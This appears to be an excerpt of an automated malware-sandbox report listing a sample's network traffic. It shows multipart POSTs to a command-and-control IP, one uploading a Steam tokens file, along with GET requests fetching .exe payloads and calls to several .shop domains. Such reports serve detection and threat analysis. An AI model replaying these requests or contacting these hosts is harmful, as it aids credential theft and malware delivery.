Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHDHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"3------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJJECFIEBFHIEGHJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="mode"4------KJKJJJECFIEBFHIEGHJD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 2b 64 41 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_data"N+dA------AKJKFBAFIDAEBFHJKJEB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 147.45.68.138Content-Length: 115113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="mode"5------CFIECBFIDGDAKFHIEHJK--
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 33 35 34 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="mode"51------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="task_id"1035440------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="status"1------HIEBAKEHDHCAKEBFBKEG--
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 33 35 34 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="mode"51------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="task_id"1035441------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="status"1------JDGCGDBGCAAEBFIECGHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"6------DHIEBAAKJDHIECAAFHCA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: stadiatechnologies.comContent-Length: 5777Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------DAKJDHIEBFIIDGDGDBAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="mode"1------CFHDBFIEGIDGIECBKJEC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="mode"2------IIDHJKFBGIIJJKFIJDBG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="mode"21------GCBGIIECGHCAKECAFBFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 147.45.68.138Content-Length: 6301Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEHost: 147.45.68.138Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 95.164.119.162 95.164.119.162
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: awwardwiqi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=fI53unXRlZI7SNoiT9of_nEXXAJBTipPy_qdTgUGuL8-1724964759-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: traineiwnqo.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.68.138
